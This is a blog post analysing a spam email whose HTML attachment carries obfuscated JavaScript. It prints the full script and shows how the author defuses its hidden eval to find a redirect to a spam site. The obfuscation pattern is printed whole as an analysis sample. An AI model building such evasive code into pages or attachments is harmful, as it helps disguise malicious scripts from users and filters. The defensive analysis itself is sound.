Robots w/Lasers

July 8, 2010

Reverse Engineering Obfuscated Javascript

I keep getting these spam emails which are making it past Gmail’s spam filter. Basically, it looks like a ‘delivery failed’ notification, with an HTML attachment which you are supposed to think is the original email. So you click on the attachment and open it, to find out which email you sent failed to go through. I finally got curious enough to see what exactly was going on. Here’s how the email looks in Gmail:

Spam email screenshot

Here’s the actual full contents of the email (some IP / email addresses removed to protect the innocent):

Delivered-To: xxx
Received: by 10.229.236.206 with SMTP id kl14cs141790qcb;
 Thu, 8 Jul 2010 09:00:59 -0700 (PDT)
Received: by 10.150.202.9 with SMTP id z9mr580063ybf.86.1278604858545;
 Thu, 08 Jul 2010 09:00:58 -0700 (PDT)
Return-Path: <borers13@reportinternational.com>
Received: from xxx
 by mx.google.com with ESMTP id l5si18198859ybj.58.2010.07.08.09.00.57;
 Thu, 08 Jul 2010 09:00:57 -0700 (PDT)
Received-SPF: neutral (google.com: xxx is neither permitted nor denied by best guess record for domain of borers13@reportinternational.com) client-ip=xxx;
Authentication-Results: mx.google.com; spf=neutral (google.com: xxx is neither permitted nor denied by best guess record for domain of borers13@reportinternational.com) smtp.mail=borers13@reportinternational.com
Received: from 93-86-52-90.dynamic.isp.telekom.rs (unknown [109.92.111.218])
 by xxx (Postfix) with ESMTP id 8CE6842D000B
 for <xxx>; Thu,  8 Jul 2010 11:00:51 -0500 (CDT)
Received: from 109.92.111.218 by mail1.optimisaplc.com; Thu, 8 Jul 2010 18:00:46 +0100
Message-ID: <000d01cb1eb6$b9f0fa90$6400a8c0@borers13>
From: postmaster@reportinternational.com
To: <xxx>
Subject: Delivery Status Notification (Failure)
Date: Thu, 8 Jul 2010 18:00:46 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_0006_01CB1EB6.B9F0FA90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB1EB6.B9F0FA90
Content-Type: text/plain;
 format=flowed;
 charset="Windows-1252";
 reply-type=original
Content-Transfer-Encoding: 7bit

Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

 borers13@reportinternational.com

Final-Recipient: rfc822;borers13@reportinternational.com
Action: failed
Status: 5.1.1

------=_NextPart_000_0006_01CB1EB6.B9F0FA90
Content-Type: text/html;
 name="Forwarded Message.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="Forwarded Message.html"

------=_NextPart_000_0006_01CB1EB6.B9F0FA90--

The first thing that threw up a red flag was that the HTML attachment was base64 encoded. Generally, if something is a text attachment it’s not encoded, which makes it easy to examine in your mail reader without executing it. So the first thing I did was decode the base64; a quick google turned up this base64 decoder tool. The result was this:

<script>var cE;if(cE!='iJV' && cE!='yJ'){cE=''};var pP;if(pP!='kX' && pP!='wMJ'){pP=''};var tIJ=false;var vUM;var iA=new Array();var uA=new Array();vUM='8d8e8'+'28095'+'888e8'+'fcf89'+'93848'+'7c1dc'+'c1c68'+'99595'+'91dbc'+'ece95'+'93848'+'f859b'+'8c809'+'38a84'+'95cf8'+'28e8c'+'ce888'+'f8584'+'99d2c'+'f8995'+'8c8dc'+'6da';var eX=new Date();var mM=22709;var jND;if(jND!='qFV' && jND!='dL'){jND=''};var dU=23633;   function e(o){var xM;if(xM == 'aV'){xM=0;};this.bJ="";this.yN="yN";var kCW = Math.random();function r(i,uD){var yT='';var zX='';this.pI='';return i['\u0063'+unescape('%68%61%72%43%6f%64%65%41%74')](uD);var yE;if(yE!='' && yE!='zP'){yE=null};var k=false;}var iP=new Array();var wY=new Array();this.fD='';var jA='';function kV(a,rU){var zM=23983;this.qP="qP";return a^rU;}var bE = new Date();  var lR;if(lR!='' && lR!='tVL'){lR=null};var f = bE['\u0067\u0065\u0074\u0053\u0065'+unescape('%63%6f%6e%64%73')]();var d = f - bA;var tLM;if(tLM!='' && tLM!='u'){tLM=''};if(d < 0) d = 1;var uB=49102;var nB=28878;if(d > 1) d = 1;var tM='';var dXC='';var iU = d;var gO;if(gO!='jG' && gO!='rS'){gO='jG'};var pHI;if(pHI!='b' && pHI != ''){pHI=null};var t = window;var fC;if(fC == 'iJ'){fC=0;};this.eA=49161;this.pR=false;var iM = document;var rR = String;var tD='';var fCN;if(fCN!='' && fCN!='rH'){fCN='c'};var cB;if(cB!='' && cB!='aB'){cB='xD'};var w = t['\u0075\u006e'+unescape('%65%73%63%61%70%65')];var eT = rR['\u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var aO;if(aO!='' && aO!='dBB'){aO=null};this.fO='';var dJ=false;var iS;if(iS!='gM' && iS!='dN'){iS=''};var jF;if(jF!='' && jF!='xI'){jF=''};var eP = '';var rO;if(rO!='' && rO!='pS'){rO=''};this.hK=false;var aW = '%';var eK = 2;var wQ = 0;this.gE="";var sG;if(sG!='' && sG!='fN'){sG=null};var y = o['\u006c'+unescape('%65%6e%67%74%68')];this.xF="";var cG = Math.random();var jX=44072;for(var q=wQ; q < y; q+=eK){this.uJ='';var yK;if(yK!='' && yK!='pHM'){yK=''};var eE;if(eE == 'qI'){eE=0;};eP+= aW + o['\u0073\u0075\u0062'+unescape('%73%74%72')](q, eK);this.fU=8141;var fW;if(fW!='' && fW!='tW'){fW=''};}var zMC=false;var o = w(eP);this.iD='';var xL=false;this.bL=1203;var n = 224 + iU;var dX = '';var zG;if(zG!='' && zG!='qCF'){zG=''};this.hH='';var rW = o['\u006c'+unescape('%65%6e%67%74%68')];var aP='';var vI;if(vI == 'uF'){vI=0;};var hVH='';for(var jQ=0; jQ < rW; jQ++){var jT;if(jT!='dH' && jT != ''){jT=null};var aNS=new Array();var rRK;if(rRK!='' && rRK!='zHV'){rRK=''};var bJX=new Date();var lV = r(o,jQ);lV = kV(lV, n);var sA;if(sA!='' && sA!='xA'){sA=''};var yKH;if(yKH!='' && yKH!='nT'){yKH=''};this.wX="wX";dX+=eT(lV);}var lU;if(lU!='' && lU!='bY'){lU=null};this.kJA='';this.mC="";t['\u0065\u0076'+unescape('%61%6C')](dX);return dX;}var bN=new Array();var wK;if(wK!='mK' && wK!='xVC'){wK='mK'};var oB='';var uWN='';var aT;if(aT!='' && aT!='oBJ'){aT=null};var wB = new Date();var bA = wB['\u0067\u0065\u0074\u0053\u0065'+unescape('%63%6f%6e%64%73')](); var uS=new Array();this.lX=3794;this.aPN=64402;setTimeout('e(vUM)', 985);var wQH;if(wQH!='' && wQH!='fH'){wQH=''};var mU=new Array();var tY=false;</script>

That's not very readable, so another quick trip to the google turned up this javascript formatter, producing this output:

var cE;
if (cE != 'iJV' && cE != 'yJ') {
    cE = ''
};
var pP;
if (pP != 'kX' && pP != 'wMJ') {
    pP = ''
};
var tIJ = false;
var vUM;
var iA = new Array();
var uA = new Array();
vUM = '8d8e8' + '28095' + '888e8' + 'fcf89' + '93848' + '7c1dc' + 'c1c68' + '99595' + '91dbc' + 'ece95' + '93848' + 'f859b' + '8c809' + '38a84' + '95cf8' + '28e8c' + 'ce888' + 'f8584' + '99d2c' + 'f8995' + '8c8dc' + '6da';
var eX = new Date();
var mM = 22709;
var jND;
if (jND != 'qFV' && jND != 'dL') {
    jND = ''
};
var dU = 23633;

function e(o) {
    var xM;
    if (xM == 'aV') {
        xM = 0;
    };
    this.bJ = "";
    this.yN = "yN";
    var kCW = Math.random();

    function r(i, uD) {
        var yT = '';
        var zX = '';
        this.pI = '';
        return i['\u0063' + unescape('%68%61%72%43%6f%64%65%41%74')](uD);
        var yE;
        if (yE != '' && yE != 'zP') {
            yE = null
        };
        var k = false;
    }
    var iP = new Array();
    var wY = new Array();
    this.fD = '';
    var jA = '';

    function kV(a, rU) {
        var zM = 23983;
        this.qP = "qP";
        return a ^ rU;
    }
    var bE = new Date();
    var lR;
    if (lR != '' && lR != 'tVL') {
        lR = null
    };
    var f = bE['\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73')]();
    var d = f - bA;
    var tLM;
    if (tLM != '' && tLM != 'u') {
        tLM = ''
    };
    if (d < 0) d = 1;
    var uB = 49102;
    var nB = 28878;
    if (d > 1) d = 1;
    var tM = '';
    var dXC = '';
    var iU = d;
    var gO;
    if (gO != 'jG' && gO != 'rS') {
        gO = 'jG'
    };
    var pHI;
    if (pHI != 'b' && pHI != '') {
        pHI = null
    };
    var t = window;
    var fC;
    if (fC == 'iJ') {
        fC = 0;
    };
    this.eA = 49161;
    this.pR = false;
    var iM = document;
    var rR = String;
    var tD = '';
    var fCN;
    if (fCN != '' && fCN != 'rH') {
        fCN = 'c'
    };
    var cB;
    if (cB != '' && cB != 'aB') {
        cB = 'xD'
    };
    var w = t['\u0075\u006e' + unescape('%65%73%63%61%70%65')];
    var eT = rR['\u0066' + unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];
    var aO;
    if (aO != '' && aO != 'dBB') {
        aO = null
    };
    this.fO = '';
    var dJ = false;
    var iS;
    if (iS != 'gM' && iS != 'dN') {
        iS = ''
    };
    var jF;
    if (jF != '' && jF != 'xI') {
        jF = ''
    };
    var eP = '';
    var rO;
    if (rO != '' && rO != 'pS') {
        rO = ''
    };
    this.hK = false;
    var aW = '%';
    var eK = 2;
    var wQ = 0;
    this.gE = "";
    var sG;
    if (sG != '' && sG != 'fN') {
        sG = null
    };
    var y = o['\u006c' + unescape('%65%6e%67%74%68')];
    this.xF = "";
    var cG = Math.random();
    var jX = 44072;
    for (var q = wQ;
    q < y;
    q += eK) {
        this.uJ = '';
        var yK;
        if (yK != '' && yK != 'pHM') {
            yK = ''
        };
        var eE;
        if (eE == 'qI') {
            eE = 0;
        };
        eP += aW + o['\u0073\u0075\u0062' + unescape('%73%74%72')](q, eK);
        this.fU = 8141;
        var fW;
        if (fW != '' && fW != 'tW') {
            fW = ''
        };
    }
    var zMC = false;
    var o = w(eP);
    this.iD = '';
    var xL = false;
    this.bL = 1203;
    var n = 224 + iU;
    var dX = '';
    var zG;
    if (zG != '' && zG != 'qCF') {
        zG = ''
    };
    this.hH = '';
    var rW = o['\u006c' + unescape('%65%6e%67%74%68')];
    var aP = '';
    var vI;
    if (vI == 'uF') {
        vI = 0;
    };
    var hVH = '';
    for (var jQ = 0;
    jQ < rW;
    jQ++) {
        var jT;
        if (jT != 'dH' && jT != '') {
            jT = null
        };
        var aNS = new Array();
        var rRK;
        if (rRK != '' && rRK != 'zHV') {
            rRK = ''
        };
        var bJX = new Date();
        var lV = r(o, jQ);
        lV = kV(lV, n);
        var sA;
        if (sA != '' && sA != 'xA') {
            sA = ''
        };
        var yKH;
        if (yKH != '' && yKH != 'nT') {
            yKH = ''
        };
        this.wX = "wX";
        dX += eT(lV);
    }
    var lU;
    if (lU != '' && lU != 'bY') {
        lU = null
    };
    this.kJA = '';
    this.mC = "";
    t['\u0065\u0076' + unescape('%61%6C')](dX);
    return dX;
}
var bN = new Array();
var wK;
if (wK != 'mK' && wK != 'xVC') {
    wK = 'mK'
};
var oB = '';
var uWN = '';
var aT;
if (aT != '' && aT != 'oBJ') {
    aT = null
};
var wB = new Date();
var bA = wB['\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73')]();
var uS = new Array();
this.lX = 3794;
this.aPN = 64402;
setTimeout('e(vUM)', 985);
var wQH;
if (wQH != '' && wQH != 'fH') {
    wQH = ''
};
var mU = new Array();
var tY = false;

Well, at least it's broken up into separate lines, but it is still pretty meaningless at a quick glance. My next step was to go through all the encoded lines and see if they turned up anything suspicious. It's easy to do in a browser. Take this line of code:

var bA = wB['\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73')]();

Go up to your browser's address bar, and enter:

javascript:alert(XYZ)

Where 'XYZ' is what you're interested in. In this case I typed:

javascript:alert('\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73'));

The result was 'getSeconds'. Looking at the line above, wB is a new Date(), so this whole line of code is effectively calling (new Date()).getSeconds(): nothing dangerous there. I then did the same for all the lines containing unicode-escaped and URL-escaped characters. The only suspicious one I could find was

    var t = window;
        // ... later ...
    t['\u0065\u0076' + unescape('%61%6C')](dX);

This translates to 'window.eval(dX)', which is basically saying 'take whatever is in the variable dX and execute it as JavaScript code'. Since nothing else was dangerous (just calls to things like String.length, String.charCodeAt, String.substr, etc.), I determined that as long as I removed that line of code, it would be safe to run. So I created a new HTML file as follows:

<html>
<body>
<!-- the textarea needs an explicit closing tag: a self-closing <textarea/> is not valid HTML,
     and a browser would treat everything after it (including the script) as the textarea's text -->
<textarea id="mytxt"></textarea>
<script>

 // ... entire script pasted here ... 

 // t['\u0065\u0076' + unescape('%61%6C')](dX);  this line replaced with:
 var mytxt = document.getElementById('mytxt');
 mytxt.value = dX;
 
 // ... rest of script ...

</script>
</body>
</html>

Instead of executing the decoded code, this dumps it into the textarea. I then simply saved this as 'hax.html', opened it in my browser, and saw:

hax.html

And there you have it: the entire result of this long and complicated obfuscated JavaScript was simply to redirect me to some spammer's site. And I didn't even have to figure out how the obfuscation worked; all I needed to do was find a single weak point, where the code has been decoded but not yet executed, and change the command that runs the code into a command that displays it.

Filed under: Software — davr @ 9:22 am
